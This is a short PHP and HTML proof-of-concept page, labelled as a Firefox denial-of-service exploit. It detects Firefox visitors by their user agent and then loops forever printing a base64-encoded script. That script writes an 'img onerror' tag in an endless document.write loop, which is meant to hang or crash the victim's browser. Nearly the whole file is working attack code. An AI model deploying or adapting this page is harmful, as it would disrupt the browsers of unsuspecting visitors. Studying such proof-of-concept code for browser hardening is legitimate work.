<!DOCTYPE html> <html> <body> <?php /* Mozilla Firefox HTML/JS DOS Vulnerability - POC by Sergio Yoshikata - @sergioyoshiman Base64 encoded exploit "/><script>while(true){document.write ('"><img src=x onerror=alert(2)>/foobar');}</script>*/ $exploit= 'Ii8+PHNjcmlwdD53aGlsZSh0cnVlKXtkb2N1bWVudC53cml0ZSAoJyI+PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDIpPi9mb29iYXInKTt9PC9zY3JpcHQ+'; //check if victim is Using Mozilla Firefox $firefox = strpos($_SERVER["HTTP_USER_AGENT"], 'Firefox') ? true : false; if ($firefox) { //loop forever while(1) { //print exploit code infinite times. print(base64_decode($exploit)); } } ?> </body> </html>